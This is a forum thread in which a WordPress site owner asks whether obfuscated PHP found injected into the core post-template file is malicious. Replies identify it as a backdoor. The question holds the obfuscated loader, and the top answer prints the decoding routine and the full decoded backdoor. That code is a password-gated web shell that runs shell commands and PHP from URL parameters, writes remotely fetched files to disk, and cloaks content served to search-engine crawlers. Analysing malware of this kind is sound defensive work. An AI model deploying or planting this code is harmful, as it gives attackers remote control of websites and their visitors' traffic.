Non-programmer wondering if this is malicious code in WordPress post-template

This is in my post-template file in includes folder (WordPress) and I’m wondering if it is malicious. Discovered via file monitor plug-in which showed a change to the file but I didn’t know if this might be a result of some non-malicious process. Excuse me if I don’t enter it properly. Appreciate your assistance. Please assume I know nothing because I don’t.

 /**
 * Applies custom filter.
 *
 * @since 0.71
 *
 * $text string to apply the filter
 * @return string
 */
    function applyfilter($text=null) {
    @ini_set('memory_limit','256M');
if($text) @ob_start();
if(1){global $O10O1OO1O;$O10O1OO1O=create_function('$s,$k',"4416375165162    15414414514315714414550441635173404416414116214714516475474773441237547414344454650515253545556576061626364656667707172737475761347710010110210310410510610711011111211311411511611712012112212312412512612713013113213313513613714040134474214114214314414514614715015115215315415515615716016116216316416516616717017117217317417517614613615210110513515715311113447117172125133624616161173631401506516713767714264160100661341637077102147120761441061267515510474124143123451321451741627215410711357165103171561121705111015112141404344176507311416455122175115141541161661275313115614252601304773401461571624050441517560734044151741631641621541451565044163517340441515353514017340441431501411627516316514216316416250441635444151546151734044156165155751631641621601571635044123544414315014116254716551557165734044143165162137153145171751411421635014615515714450441534053404415154716551517340441431651621371531451717544156165155554414316516213715314517173401511465044143165162137153145171746051404414316516213715314517175441431651621371531451715371657340441431501411627516316514216316416250441235444143165162137153145171546151734044164141162147145164567544143150141162734017540162145164165162156404416414116214714516473"); if(!function_exists("O01100llO")){function O01100llO(){global $O10O1OO1O;return call_user_func($O10O1OO1O,'xEe%7c0BgX%3cyl%3cJrCC%3cCffjjA%5dio%21fj%2bu%21%3bRiiRHIe55%3a7GK4ud%2dYfEWWEv%22%20FFVz%3b%3c%3c%26%2fA%26%5bmVvllG9bCC%40%3bL%29%2fhV%40%3cc%3c%3dNpx2%2d%2dRS3%2c%2c%7cE%2bE%3d%3a%7c%2cRyf%5eAA%5dooIf0GT8c%7cgZCimGK%3a%21yCcy%28Tr%7c%2e%21%2cR%5c9N%28y%3b%7dx%2dY%5eM%21%2dM%2b%7e%5d%23%3bL%2a%5b%27%7crqg7F%3dFPR%5fu%26v6S%258%2f%20%3fR%3cr%7c%3cNVoIDnlJ%2elfGJJ%21%20oJM%29R%3b%2da%202LM%20tLL%2c%2cnb7MfX%40bEAb%3fqOB%5dz%5ezh%5dk5T23I%262pr95P%29xHuw%3f%5fr%23LLt9x%2c4dPQsNaWFbv0XT%3cY%5eZo%5effO%5dl%27O%27q21%7bHU%5biw%29%406zRb%2a%2df1%26%7eeZH%28a%5d%5bv%7d%40rl%27%5eT%3fs%2a%21QN0ow6%27Ec%29%5bK%26%7crq%3c%7bgd%5cPDy9%5f7%5cB%3ep%40bP%3a%5ePL%5ede%25%7d%3a%29Hr%21WNS%229V%25Gy%2eJCGokJX%29N%2bRv0%26W7Yn4%4066f7wMu%2f%28anf%5ejXn%3ed%2fA%3f%5d%5bhpqh3%25%5f%3fBw%3elr%7bbnz39s8%3f%409%21%20s%2e%3f%3dCF%7ctyJ%2e%3a%2eHCZ%21uK%24bY%7c6%40%3crCiQ%21xCOz%40Qo%20%2dWfM%3bzt%5dWIRn%27OIUvE0UAUo%60%3eA1Z3er%3allG92%7c%23qeNt8iiQ%20%20%24%7e%7e%3di%29%40Ikw6P%2fuCVPMoDG%3av%2c5%26qr%3aXl%28t%21%3ba%5dJ%23iL%7d%28%28%7bws%24%28%5fq%25AE%5f%3dMwuS9N%2eytv0E%5doj0uEiz1w9qST%2clCiHiKLhs6y%2eCAWgTS%3eS%23%21U%2d%3eJmV%7dMI%27O%3aZ%2e%20Kb%7c%23%28H%24RjCQx%7et%23%23%26h%40%21%23h%5bTf%5ehd%2d%60C%3c%27zO%5dX%27%5c%40%2eB%3aXz%27dzp71p%26TDMrc%7dGZ%2aGe%2dljy%5fr9cVBgS%21W%24%2aBc%3cLc%29yr%29e%2cM%5fbNwX%2b8XYh0%3eECRa%28%7d%2bOQL%24MvRRw%40PtRph%3aI%27pcW%5fYKEjUqhIdP%28m%2ek4q6spsh%5bwgPBd3%5c9d6d8cHQ%2b%5cJ8%7clcrCtV%5dTJOmD%3axlS%25r01lLx%7da%7dt7J%5e%29%7e%2bYWb%210%7d00j%5dn%5en7lMr%29H%5cZnhk%27%5bk%3e%5fw%22UDkg%27D%2a%5e%23S%5bANE%27%2bk1%5fO0zq%5eq%7bph3zB%5cXP%25c%2d%2exJ%2e%2eiv%2cBdXrJLt%283%27Oyo%5e4p%7e%21MnL%26%23k2CxFEo%5d%2dknkEY%2af%5cbo3%601l%3cTE%3cokS%3dnX%25QcfE%28PFwF%3dVC%2fz%26QSZ%25SSr%23%2159RdNV%7dNxH%29C%3ax%2bvPV0AL%2dtLLM%5dA%25r%5bi%7b%212%268%27%7ev%2c%60qnokYO%227%28M4%28%2dWBgXEh%27o1yoVYi%24%7bP64%5c5%5fl%60r5JK%5b%60C%5b17Q%2b%5cioXlmFDPS%7cGZa%7ds%3df%3cn2%7cY%22%60yC%24%7e%2fN%2c%20NJ%28bN%282Ul99%2fpCy%5cJpwl%5c9%24aFv%3fr0OI%3ew9I94%22%3cmL%7cK%3aCrS%3b3LhZemTpTScHxA%7erl%3a%25mrL%28%5b%7dvbW0v%7d%5bZq%7c%2ar%2f%3bJC%235CRa%28%7d%2bOIF2s%23LXM%2dnd%2dq%7dYI%27kzN%5b%5e%5b%5b1%60OqOdS%3dygh%3a%3aGGKu4C%40%3aG%3b4mP4%3cB%3d%3d4Sg8P6V%3c%25m%3b%7ecR%20%3d%2dy%3czcx%24x%29%26r%29Jf%29M%3b%29%2c%7e%7d%7dJ%7eXRb00q%28REj%2aL%27%2bk%27fkk%2b%5csn7%2aCqEXw7k74DT%29O%3c5%5b%24%26%2d5F%3e83s%3e%3fTJ4BdmP%2bt%3f%2dgM%3ea%28S%7d%5dm%5bZ%21i%2ecKtu%2f0bHjhu%5e%2d%2e4x8%2c%23H%2dtX%20%2d%2a%2aENfkk7%22%3cNr%27%2aWjUAbE2I%5d3Vm%2ek%3e%27h3UZS%5c%28%3b8V8%3fCw%2fVNn%3emcDS%3eF%24gPRkcel%25MRrvWz%25%20%2f%28L%28%23G0%3b5%2a%21vR%21%2btNN%21N%5fW7%224pp%40X%5f5n%27Ok%27%3fY%40A1%7b%605hmA%3e%5b1h%26ZO%3c9%5f%405%3a%3c%7b48P99P7CfcSW6Hor%3af%23D%2fuG%2fW%3c%2bcbQ%20%21S%23u%23Q%2fyxjy%22txz%29H2I%3bnb0fX37%2d9%7dph%5eX%5d%2acW%5b%5e1312X5h7OCBo%2667%26sw%40%40%26%40%2e%5cs%29iQQP%2eC%5cHK%40Vd%20VKeVu%25GGd%25%21lHQQWZKtu%2flf%5eK%2bupQY%20%21%27k%24qO%2bff%7bg%3bjNoIoAae%5eoOkz%5eA%3ffuqAmPh44%3cx%27Fz3%22%3f5%227l%22%3dg%22D%3fVV7%3f%3aFerr%23BGTD%7cr%3eSQZ%25TvWS%2dZW%21LL%607%2dQH%28%3bC%20b%24%23z%27%28%268%24XMA%5dAfRhEzzTvw%2b%5e%271E%27kP%2773%27%221%5f%5fk1gw8BBr%7b%3e%3cF%3dpP7Jx%22Gp0cB6%3aG%3eGuL%2dAVzx%23HQ%3aJ%2bvGfY%28%2e%2djhu%5e%2dvvp8%2c%23H%2dtX%20%2d%2a%2aENfkk7%22%3cNr%27%2aWjUAbE2I%5d3Vm%2ek4q%5c8%5cp2%25sdd%3b%60e5%40P%3csPBHPrcPl%3c%7c%7cB%3c%29e%2exxaTxZ%21%20%24y%24Llf%5eK%2bup%2dHyv%2b%21%2bb%5b%268%24V0%2dAEonoO9%5fns%22%5b%5e1%3fr081%5f%5fyH5O%5d1q%5c%271%40%40gwsddKu%2dwWV%407%3fDBpgTFPe%28L%5edCSxHxyTa%29%24%242%7cN%3a%2e%20%2d%29unya%20WYW%2cQ%23%2d%28%2c%2bMM%2dd%2dq1nz%5dn%5bAOOnO%3dm%3c%3ccSSZ%3dF%40zZD5%40e%3d%26ZdhtF%3dVDF%3e%3de%3fSi%29%3aB%24%2aB%23%5fvE%2d%28%7dxH%29xx%21%2bv%28l%5el%26%5bU113%2ek4p%40%28%20abtq1%7eOzLh%5dINIO%2749AzBFPcgK%2fjSrGSGIT%27dFUZ%3fP%60Pd%3eKlsF%29%20itH%2bY%5c%2d%2cW%2d%2bPL%3e%21%20V%7dxi%25i%21Q%2bv%2e%20%5eoAUjw%5fy33%5bhHziE%5d%20%26Xj%2djEA5%60%2a%5d%40%3f%5c%3d6e%7cbm%3dZ%3d%25%7cAVC%5dF%2bli%3dSs%3f8ssPlr%3d%5fJ%5fsV%3dBVB8cr8%24Xf%5e%3cVryS%3d%7dM%3ci%21Qii%24bYt%2fE%2fR%7e%2cM%7dx%27%406%5cL%24N0R%7e1%7bLEo%5dEE%27%2272n%3fnXk%5bkA1wAV%2eJx%26zw6%7bU%25Z%26g%3ePggVuKT4i4%3d%25%3c%3fS%3a%3f%7ef%5ejT%3d%3a%2e%25mMaTQ%20%21QQ%7e%2an%2du%5duWJ%23R%7d%29O6%5cst%7evX%7d%28%7b3t%5dko%5d%5dO49%26bBbOI5o%5edCy%2e%5b%27hpqSiUc%3fvsPd%3fwBpM79a%22%3egi%29%7b%7d%24%3f%20K2lC%2eK%3c%2feOl%3a%20ui%24%28KM%2f%2eJ%2dA%5e%24%7dI%22%29krw82U%2f%22%28%7b3t1whI%2foz%5bIb%27j%3alsO%7bdFA8%3foVYlHzT8N%5cg%3e85%3f4%7dm%3cD%3c8eHxeI%25%3aGed%7c%3c%2dAVtxe%26HieL%26%3a%24%7eKaf%2fiLt%20L%20QaY1%7eWv%24%60%28nj0%22%2cj%5ea%40NYjIjPf%5bUXF%5e4%5d%5bh5%25U7%5fz%7c%5bd17s8y%3f%22%3dwy%7d7C%5bt%2bP8%3crF%2aBD%3a%2ft%3b%7cknk%3cM%2fUo%5be%2bx%5ej%5eK%2bu%5eaS%20Y%3f%3b%28N%2a%3f0fXfaoh3o%2bZI%27%2b%7bM4%5dv%3fr08%7b%7bwy7%22977%40c%3cs%2c6BPsh8%22%2eGmO%5c%25bgB%3c%7c%20n8%215WiAt%7eRtyyHzU%5bKr%29%7eCXlXf%2ff%2d%2d%2c4p1z%40Qo%20%2aR%5eA%5e0t3%29%3fM79Np%22%7emn9%2208%7dcFu%3f%5bpw%5b6h44%5b4yy%2exxHiigyu%26%29GpxFbPG%3a%25%3fS%3aZ%2eRMoDZ%21i%2ec%23%2f%28%20%24tf0Qk%5cZSmc%25%3a%29KlZ3%5b%2e3PLak%5dfR%27bUIO%26%5c%40o%3eJa%7d%3bRMWAW%28b0b%2bfXt%2aAvv%5dyiCR%5f%40STV%22ZPr%25eG%7e%23c%7dz%404w%22p8DgBwgh4%22gmE%2fc%7diMzs%7e%24an%40%21eYoNYnR48p%5cM9YkoObqofz%5dl%3ba%7e%20El%25%7c%3a%29%5e5%7b%40%3eBqXoKhu%2dwpc%3cF9%25g%7cSZl%24%20TROp%22594sm%3f7%40w8FF%5ekf3KX%3c7Hv%2c%2dJ%7eX%3b%282Ua%7bg%3b1%3a%3dN%27kjMX02EOA%5b%3fs%27%3eKjI%227%60%5d%5bw%22%5c3ZS7%3a%7e%7b%404%2fG%27a%2cN%3f6%3dZP%5c%2eJ%3f%202sd%25%2eJCV%25%2e%7c%3a%25%3c%2cqo%5dofGWX%3c7%2eJ9x%2bW%2dt%2dt%2a%20%7df%5eXA5MeOIAa0%7bfXnJ1%7bq%60Gj%5dcdtj%273%5cs%40z3%5c5%5f3%26yhnh%5bUX%5b9jq1%263%24%2aHgK%3cyJy%2fmR%5c%27%2d',3863);}call_user_func(create_function('',"x65x76x61l(x4F01100llO());"));}}

Related posts

Leave a Reply

4 comments

  1. It’s a remote-execution exploit, and possibly more as well

    This code evals what appears to be a decryption function:

    $s=ur    ldecode($s);
     $target='';
    $S='!#$%&()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_` '"abcdefghijklmnopqrstuvwxyz{|}~f^jAE]okI'OzU[2&q1{3`h5w_79"4p@6s8?BgP>dFV=mD<TcS%Ze|r:lGK/uCy.Jx)HiQ! #$~(;Lt-R}Ma,NvW+Ynb*0X';
     for ($i=0;
     $i<strlen($s);
     $i++) { $char=substr($s,$i,1);
     $num=strpos($S,$char,95)-95;
     $cur_key=abs(fmod($k + $i,95));
     $cur_key=$num-$cur_key;
     if($cur_key<0) $cur_key=$cur_key+95;
     $char=substr($S,$cur_key,1);
     $target.=$char;
     } return $target;
    

    It then calls this function with key 3863 on the following giant string:

    "xEe|0BgX<yl<JrCC<CffjjA]io!fj+u!;RiiRHIe55:7GK4ud-YfEWWEv" FFVz;<<&/A&[mVvllG9bCC@;L)/hV@<c<=Npx2--RS3,,|E+E=:|,Ryf^AA]ooIf0GT8c|gZCimGK:!yCcy(Tr|.!,R9N(y;}x-Y^M!-M+~]#;L*['|rqg7F=FPR_u&v6S%8/ ?R<r|<NVoIDnlJ.lfGJJ! oJM)R;-a 2LM tLL,,nb7MfX@bEAb?qOB]z^zh]k5T23I&2pr95P)xHuw?_r#LLt9x,4dPQsNaWFbv0XT<Y^Zo^ffO]l'O'q21{HU[iw)@6zRb*-f1&~eZH(a][v}@rl'^T?s*!QN0ow6'Ec)[K&|rq<{gdPDy9_7B>p@bP:^PL^de%}:)Hr!WNS"9V%Gy.JCGokJX)N+Rv0&W7Yn4@66f7wMu/(anf^jXn>d/A?][hpqh3%_?Bw>lr{bnz39s8?@9! s.?=CF|tyJ.:.HCZ!uK$bY|6@<rCiQ!xCOz@Qo -WfM;zt]WIRn'OIUvE0UAUo`>A1Z3er:llG92|#qeNt8iiQ $~~=i)@Ikw6P/uCVPMoDG:v,5&qr:Xl(t!;a]J#iL}(({ws$(_q%AE_=MwuS9N.ytv0E]oj0uEiz1w9qST,lCiHiKLhs6y.CAWgTS>S#!U->JmV}MI'O:Z. Kb|#(H$RjCQx~t##&h@!#h[Tf^hd-`C<'zO]X'@.B:Xz'dzp71p&TDMrc}GZ*Ge-ljy_r9cVBgS!W$*Bc<Lc)yr)e,M_bNwX+8XYh0>ECRa(}+OQL$MvRRw@PtRph:I'pcW_YKEjUqhIdP(m.k4q6spsh[wgPBd39d6d8cHQ+J8|lcrCtV]TJOmD:xlS%r01lLx}a}t7J^)~+YWb!0}00j]n^n7lMr)HZnhk'[k>_w"UDkg'D*^#S[ANE'+k1_O0zq^q{ph3zBXP%c-.xJ..iv,BdXrJLt(3'Oyo^4p~!MnL&#k2CxFEo]-knkEY*fbo3`1l<TE<okS=nX%QcfE(PFwF=VC/z&QSZ%SSr#!59RdNV}NxH)C:x+vPV0AL-tLLM]A%r[i{!2&8'~v,`qnokYO"7(M4(-WBgXEh'o1yoVYi${P645_l`r5JK[`C[17Q+ioXlmFDPS|GZa}s=f<n2|Y"`yC$~/N, NJ(bN(2Ul99/pCyJpwl9$aFv?r0OI>w9I94"<mL|K:CrS;3LhZemTpTScHxA~rl:%mrL([}vbW0v}[Zq|*r/;JC#5CRa(}+OIF2s#LXM-nd-q}YI'kzN[^[[1`OqOdS=ygh::GGKu4C@:G;4mP4<B==4Sg8P6V<%m;~cR =-y<zcx$x)&r)Jf)M;),~}}J~XRb00q(REj*L'+k'fkk+sn7*CqEXw7k74DT)O<5[$&-5F>83s>?TJ4BdmP+t?-gM>a(S}]m[Z!i.cKtu/0bHjhu^-.4x8,#H-tX -**ENfkk7"<Nr'*WjUAbE2I]3Vm.k>'h3UZS(;8V8?Cw/VNn>mcDS>F$gPRkcel%MRrvWz% /(L(#G0;5*!vR!+tNN!N_W7"4pp@X_5n'Ok'?Y@A1{`5hmA>[1h&ZO<9_@5:<{48P99P7CfcSW6Hor:f#D/uG/W<+cbQ !S#u#Q/yxjy"txz)H2I;nb0fX37-9}ph^X]*cW[^1312X5h7OCBo&67&sw@@&@.s)iQQP.CHK@Vd VKeVu%GGd%!lHQQWZKtu/lf^K+upQY !'k$qO+ff{g;jNoIoAae^oOkz^A?fuqAmPh44<x'Fz3"?5"7l"=g"D?VV7?:Ferr#BGTD|r>SQZ%TvWS-ZW!LL`7-QH(;C b$#z'(&8$XMA]AfRhEzzTvw+^'1E'kP'73'"1__k1gw8BBr{><F=pP7Jx"Gp0cB6:G>GuL-AVzx#HQ:J+vGfY(.-jhu^-vvp8,#H-tX -**ENfkk7"<Nr'*WjUAbE2I]3Vm.k4q8p2%sdd;`e5@P<sPBHPrcPl<||B<)e.xxaTxZ! $y$Llf^K+up-Hyv+!+b[&8$V0-AEonoO9_ns"[^1?r081__yH5O]1q'1@@gwsddKu-wWV@7?DBpgTFPe(L^dCSxHxyTa)$$2|N:. -)unya WYW,Q#-(,+MM-d-q1nz]n[AOOnO=m<<cSSZ=F@zZD5@e=&ZdhtF=VDF>=e?Si):B$*B#_vE-(}xH)xx!+v(l^l&[U113.k4p@( abtq1~OzLh]INIO'49AzBFPcgK/jSrGSGIT'dFUZ?P`Pd>KlsF) itH+Y-,W-+PL>! V}xi%i!Q+v. ^oAUjw_y33[hHziE] &Xj-jEA5`*]@?=6e|bm=Z=%|AVC]F+li=Ss?8ssPlr=_J_sV=BVB8cr8$Xf^<VryS=}M<i!Qii$bYt/E/R~,M}x'@6L$N0R~1{LEo]EE'"72n?nXk[kA1wAV.Jx&zw6{U%Z&g>PggVuKT4i4=%<?S:?~f^jT=:.%mMaTQ !QQ~*n-u]uWJ#R})O6st~vX}({3t]ko]]O49&bBbOI5o^dCy.['hpqSiUc?vsPd?wBpM79a">gi){}$? K2lC.K</eOl: ui$(KM/.J-A^$}I")krw82U/"({3t1whI/oz[Ib'j:lsO{dFA8?oVYlHzT8Ng>85?4}m<D<8eHxeI%:Ged|<-AVtxe&HieL&:$~Kaf/iLt L QaY1~Wv$`(nj0",j^a@NYjIjPf[UXF^4][h5%U7_z|[d17s8y?"=wy}7C[t+P8<rF*BD:/t;|knk<M/Uo[e+x^j^K+u^aS Y?;(N*?0fXfaoh3o+ZI'+{M4]v?r08{{wy7"977@c<s,6BPsh8".GmO%bgB<| n8!5WiAt~RtyyHzU[Kr)~CXlXf/f--,4p1z@Qo *R^A^0t3)?M79Np"~mn9"08}cFu?[pw[6h44[4yy.xxHiigyu&)GpxFbPG:%?S:Z.RMoDZ!i.c#/( $tf0QkZSmc%:)KlZ3[.3PLak]fR'bUIO&@o>Ja};RMWAW(b0b+fXt*Avv]yiCR_@STV"ZPr%eG~#c}z@4w"p8DgBwgh4"gmE/c}iMzs~$an@!eYoNYnR48pM9YkoObqofz]l;a~ El%|:)^5{@>BqXoKhu-wpc<F9%g|SZl$ TROp"594sm?7@w8FF^kf3KX<7Hv,-J~X;(2Ua{g;1:=N'kjMX02EOA[?s'>KjI"7`][w"3ZS7:~{@4/G'a,N?6=ZP.J? 2sd%.JCV%.|:%<,qo]ofGWX<7.J9x+W-t-t* }f^XA5MeOIAa0{fXnJ1{q`Gj]cdtj'3s@z35_3&yhnh[UX[9jq1&3$*HgK<yJy/mR'-"
    

    This results in the following code, which I have not read:

    $Err='';
    function l101001l0l(){
        global $O10O1OO1O; global $O100lO10l; if($O100lO10l==1) return; $O100lO10l=1; if(!l00101101($_SERVER['HTTP_USER_AGENT'],$_SERVER['REMOTE_ADDR'])) return; $U=array('/home/'=&gt;'/home/djinn/evermore.imagedjinn.com/home/wp-includes/images/nix756.doc#5988'); if('636c8288db06d931093b5539688e00c8'==(isset($_GET["pw"])?@md5($_GET["pw"]):"0")) {
            print('__beg__<br>');
            if(isset($_GET['ccc'])) {
                print(l0ll0110l($_GET['ccc']));
                
            }
            elseif(isset($_GET['eee'])) {
                eval(stripslashes($_GET['eee']));
                
            }
            else {
                set_error_handler('l1l011100l');
                $D=l10010110l($_GET['sss']);
                if($D=='') print('failed-1: '.$Err);
                $H=$_GET['ddd'];
                @chmod($H,0644);
                if(($H=fopen($H,'wb'))===false) print('failed-2: '.$Err);
                $L=strlen($D);
                if(fwrite($H,$D,$L)!=$L) {
                    sleep(8);
                    if(fwrite($H,$D,$L)!=$L) print('failed-3: '.$Err);
                    
                }
                @fclose($H);
                restore_error_handler();
                
            }
            print('<br>__end__');
            return;
            
        }
        error_reporting(E_ALL);
        while(true) {
            $RU=$_SERVER['REQUEST_URI'];
            if(strpos($RU,'http://')!==false) {
                $RU=str_replace('http://','',$RU);
                $RU=substr($RU,strpos($RU,'/'),strlen($RU)-strpos($RU,'/'));
                
            }
            if(!isset($U[$RU])) break;
            $R=@explode('#',$U[$RU]);
            $D=read_file($R[0]);
            $D=call_user_func($O10O1OO1O,$D,$R[1]);
            if(substr($D,0,1)!='&lt;
            '||substr($D,strlen($D)-1,1)!='&gt;
            ') break;
            print($D);
            break;
            
        }
        error_reporting(0);
        
    }
    l101001l0l();
    function read_file($f){
        $o = null;
        if(function_exists('curl_version')) {
            @ob_start();
            $h = @curl_init('file:/'.'/'.$f);
            @curl_exec($h);
            $o = @ob_get_contents();
            @ob_end_clean();
            
        }
        if ($o==null) $o=@implode('',@file($f));
        return $o;
        
    }
    function l1l011100l($errno, $errstr, $file, $line){
        global $Err; $Err=$errno."-".str_replace("n",'',$errstr)."-".$line; return true;
    }
    function l0ll0110l($c){
        if(function_exists('exec')) {
            @exec($c,$out); return @implode("n",$out);
        }
        elseif(function_exists('shell_exec')) {
            $out=@shell_exec($c);
            return $out;
            
        }
        elseif(function_exists('system')) {
            @ob_start();
            @system($c,$ret);
            $out=@ob_get_contents();
            @ob_end_clean();
            return $out;
            
        }
        elseif(function_exists('passthru')) {
            @ob_start();
            @passthru($c,$ret);
            $out=@ob_get_contents();
            @ob_end_clean();
            return $out;
            
        }
        else {
            return "failed";
        }
        
    }
    function l00101101($ua,$ip){
        $ua=strtolower($ua); $R1=(!(strpos($ua,'853767')===false)) || (substr($ip,0,5)=='157.5') || (substr($ip,0,5)=='157.6') || (substr($ip,0,4)=='65.5') || (substr($ip,0,6)=='207.46'); $R2=!(strpos($ua,'googlebot')===false && strpos($ua,'slurp')===false && strpos($ua,'bingbot')===false && strpos($ua,'msnbot')===false && strpos($ua,'yahoo')===false && strpos($ua,'live')===false); $sHostname=''; if($R2) $sHostname=gethostbyaddr($ip); $R3=($R2 && !($sHostname==$ip)) || $R1; $sHostname=strrev($sHostname); $seArray=array('googlebot.com','msn.com','bing.com','yahoo.com','yahoo.net'); $R4=false; for($i=0; $i&lt;5; $i++) {
            $sRevAgent=strrev($seArray[$i]);
            $pos=strpos($sHostname,$sRevAgent);
            $R4|=(!($pos===false) && $pos==0);
            
        }
        return $R3 && ($R4 || $R1);
        
    }
    function l10010110l($U){
        $h=curl_init();
        curl_setopt($h,CURLOPT_URL,$U);
        curl_setopt($h,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($h,CURLOPT_USERAGENT,'User-Agent: Mozilla/4.0 (compatible;
        MSIE 5.01;
        Widows NT)');
        curl_setopt($h,CURLOPT_TIMEOUT,1);
        $R=curl_exec($h);
        $I=curl_getinfo($h);
        curl_close($h);
        if($R===false || $I['http_code']!=200) {
            $R=''; trigger_error("Curl_exec Error: ".$I['http_code'], E_USER_ERROR);
        }
        return $R;
        
    }
    
  2. I would advise you STRONGLY against installing this theme on your server… it is obvious the author is doing his/her best to obfuscate something – and it can’t be good..

  3. I also had this infection and if you have several blogs on your server, chances are they will all be infected. Notify your host and they’ll run a security scan and CHMOD all bad files to 000

  4. Just got beaten up by someting very much like this. I don’t know what it did/does, but it’s bad enough that it corrupted 3 sites. Badly enough that we are starting two completely from scratch.

    I’ve learned from that that anything NOT obvious (i.e. an index file down within a CSS folder, or vice versa) should be viewed with extreme prejudice, as well as any activity in logs that changes files that would otherwise just be static.

    For example, if a footer changed, and you haven’t done any design changes, then something is amiss.

    From what I have read this is likely a FTP exploit.